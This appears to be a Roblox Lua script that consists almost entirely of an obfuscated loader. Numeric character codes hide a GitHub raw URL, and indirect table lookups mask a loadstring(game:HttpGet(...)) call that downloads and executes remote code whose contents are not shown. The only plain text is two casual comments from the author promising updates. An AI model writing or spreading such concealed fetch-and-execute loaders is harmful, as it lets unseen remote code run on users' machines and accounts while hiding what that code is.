-- what are you doing here???
-- im gonna start pushing updates on this script btw for anyone seeing this

local __67_ = {
    ['\242'] = function(u) return loadstring(game:HttpGet(u))() end,
    ['\173'] = function(n)
        local t,i = {},1
        for v in n:gmatch('%d+') do
            t[i],i = string.char(v+0),i+1
        end
        return table.concat(t)
    end,
    ['\192'] = '104 116 116 112 115 58 47 47 114 97 119 46 103 105 116 104 117 98 117 115 101 114 99 111 110 116 101 110 116 46 99 111 109 47 100 97 110 105 101 108 50 53 54 53 47 66 108 97 105 114 47 114 101 102 115 47 104 101 97 100 115 47 109 97 105 110 47 86 49',
    ['\111'] = function(...) local a={...} return a[1](a[2](a[3])) end,
    ['\255'] = '\242\173\192'
}

(function(a)
    local s,m,d = a['\255']:byte(1),a['\255']:byte(2),a['\255']:byte(3)
    local f1,f2,f3 = a[string.char(s)],a[string.char(m)],a[string.char(d)]
    return a['\111'](f1,f2,f3)
end)(__67_)
